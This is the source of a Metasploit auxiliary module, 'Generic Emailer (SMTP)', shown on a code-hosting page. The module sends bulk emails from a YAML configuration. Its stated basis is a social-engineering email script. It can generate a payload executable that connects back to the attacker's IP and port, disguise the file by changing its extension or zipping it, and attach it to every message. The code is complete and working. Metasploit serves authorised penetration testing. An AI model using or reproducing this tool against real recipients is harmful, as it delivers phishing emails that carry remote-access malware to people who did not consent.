Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/client/smtp/emailer.rb
19719 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'yaml'

7


8
class MetasploitModule < Msf::Auxiliary

9


10
  #

11
  # This module sends email messages via smtp

12
  #

13
  include Msf::Exploit::Remote::SMTPDeliver

14
  include Msf::Exploit::EXE

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Generic Emailer (SMTP)',

21
        'Description' => %q{

22
          This module can be used to automate email delivery.

23
          This code is based on Joshua Abraham's email script for social

24
          engineering.

25
        },

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'URL', 'http://spl0it.org/' ],

29
        ],

30
        'Author' => [ 'et <et[at]metasploit.com>' ],

31
        'Notes' => {

32
          'Stability' => [CRASH_SAFE],

33
          'SideEffects' => [],

34
          'Reliability' => []

35
        }

36
      )

37
    )

38


39
    register_options(

40
      [

41
        OptString.new('RHOST', [true, 'SMTP server address', '127.0.0.1']),

42
        OptPort.new('RPORT', [true, 'SMTP server port', 25]),

43
        OptString.new('YAML_CONFIG', [

44
          true, 'Full path to YAML Configuration file',

45
          File.join(Msf::Config.data_directory, 'emailer_config.yaml')

46
        ]),

47
      ]

48
    )

49


50
    # Hide this option from the user

51
    deregister_options('MAILTO')

52
    deregister_options('SUBJECT')

53
  end

54


55
  def load_yaml_conf

56
    opts = {}

57


58
    File.open(datastore['YAML_CONFIG'], 'rb') do |f|

59
      yamlconf = YAML.safe_load(f)

60


61
      opts['to'] = yamlconf['to']

62
      opts['from'] = yamlconf['from']

63
      opts['subject'] = yamlconf['subject']

64
      opts['type'] = yamlconf['type']

65
      opts['msg_file'] = yamlconf['msg_file']

66
      opts['wait'] = yamlconf['wait']

67
      opts['add_name'] = yamlconf['add_name']

68
      opts['sig'] = yamlconf['sig']

69
      opts['sig_file'] = yamlconf['sig_file']

70
      opts['attachment'] = yamlconf['attachment']

71
      opts['attachment_file'] = yamlconf['attachment_file']

72
      opts['attachment_file_type'] = yamlconf['attachment_file_type']

73
      opts['attachment_file_name'] = yamlconf['attachment_file_name']

74


75
      ### payload options ###

76
      opts['make_payload'] = yamlconf['make_payload']

77
      opts['zip_payload'] = yamlconf['zip_payload']

78
      opts['msf_port'] = yamlconf['msf_port']

79
      opts['msf_ip'] = yamlconf['msf_ip']

80
      opts['msf_payload'] = yamlconf['msf_payload']

81
      opts['msf_filename'] = yamlconf['msf_filename']

82
      opts['msf_change_ext'] = yamlconf['msf_change_ext']

83
      opts['msf_payload_ext'] = yamlconf['msf_payload_ext']

84
    end

85


86
    opts

87
  end

88


89
  def load_file(fname)

90
    buf = ''

91
    File.open(fname, 'rb') do |f|

92
      buf = f.read

93
    end

94


95
    buf

96
  end

97


98
  def run

99
    yamlconf = load_yaml_conf

100


101
    fileto = yamlconf['to']

102
    from = yamlconf['from']

103
    subject = yamlconf['subject']

104
    type = yamlconf['type']

105
    msg_file = yamlconf['msg_file']

106
    wait = yamlconf['wait']

107
    add_name = yamlconf['add_name']

108
    sig = yamlconf['sig']

109
    sig_file = yamlconf['sig_file']

110
    attachment = yamlconf['attachment']

111
    attachment_file = yamlconf['attachment_file']

112
    attachment_file_type = yamlconf['attachment_file_type']

113
    attachment_file_name = yamlconf['attachment_file_name']

114


115
    make_payload = yamlconf['make_payload']

116
    zip_payload = yamlconf['zip_payload']

117
    msf_port = yamlconf['msf_port']

118
    msf_ip = yamlconf['msf_ip']

119
    msf_payload = yamlconf['msf_payload']

120
    msf_filename = yamlconf['msf_filename']

121
    msf_change_ext = yamlconf['msf_change_ext']

122
    msf_payload_ext = yamlconf['msf_payload_ext']

123


124
    tmp = Dir.tmpdir

125


126
    datastore['MAILFROM'] = from

127


128
    msg = load_file(msg_file)

129


130
    if type !~ /text/i && type !~ %r{text/html}i

131
      print_error("YAML config: #{type}")

132
    end

133


134
    if make_payload

135
      attachment_file = File.join(tmp, msf_filename)

136
      attachment_file_name = msf_filename

137


138
      print_status('Creating payload...')

139
      mod = framework.payloads.create(msf_payload)

140
      if !mod

141
        print_error("Failed to create payload, #{msf_payload}")

142
        return

143
      end

144


145
      # By not passing an explicit encoder, we're asking the

146
      # framework to pick one for us.  In general this is the best

147
      # way to encode.

148
      buf = mod.generate_simple(

149
        'Format' => 'raw',

150
        'Options' => { 'LHOST' => msf_ip, 'LPORT' => msf_port }

151
      )

152
      exe = generate_payload_exe({

153
        code: buf,

154
        arch: mod.arch,

155
        platform: mod.platform

156
      })

157


158
      print_status("Writing payload to #{attachment_file}")

159
      File.open(attachment_file, 'wb') do |f|

160
        f.write(exe)

161
      end

162


163
      if msf_change_ext

164
        msf_payload_newext = attachment_file

165
        msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")

166
        File.rename(attachment_file, msf_payload_newext)

167
        attachment_file = msf_payload_newext

168
      end

169


170
      if zip_payload

171
        zip_file = attachment_file.sub(/\.\w+$/, '.zip')

172
        print_status("Zipping payload to #{zip_file}")

173
        File.write(zip_file, Msf::Util::EXE.to_zip([fname: File.basename(attachment_file), data: exe]), mode: 'wb')

174
        attachment_file = zip_file

175
        attachment_file_type = 'application/zip'

176
      else

177
        attachment_file_type = 'application/exe'

178
      end

179


180
    end

181


182
    File.open(fileto, 'rb').each do |l|

183
      next if l !~ /@/

184


185
      nem = l.split(',')

186
      name = nem[0].split(' ')

187
      fname = name[0]

188
      _lname = name[1]

189
      email = nem[1].strip

190


191
      if add_name

192
        email_msg_body = "#{fname},\n\n#{msg}"

193
      else

194
        email_msg_body = msg

195
      end

196


197
      if sig

198
        data_sig = load_file(sig_file)

199
        email_msg_body = "#{email_msg_body}\n#{data_sig}"

200
      end

201


202
      print_status("Emailing #{name[0]} #{name[1]} at #{email}")

203


204
      mime_msg = Rex::MIME::Message.new

205
      mime_msg.mime_defaults

206


207
      mime_msg.from = from

208
      mime_msg.to = email

209
      datastore['MAILTO'] = email.strip

210
      mime_msg.subject = subject

211


212
      mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, 'base64', 'inline')

213


214
      if attachment && attachment_file_name

215
        data_attachment = load_file(attachment_file)

216
        mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, 'base64', "attachment; filename=\"#{attachment_file_name}\"")

217
      end

218


219
      send_message(mime_msg.to_s)

220
      select(nil, nil, nil, wait)

221
    end

222


223
    print_status('Email sent..')

224
  end

225
end

226


227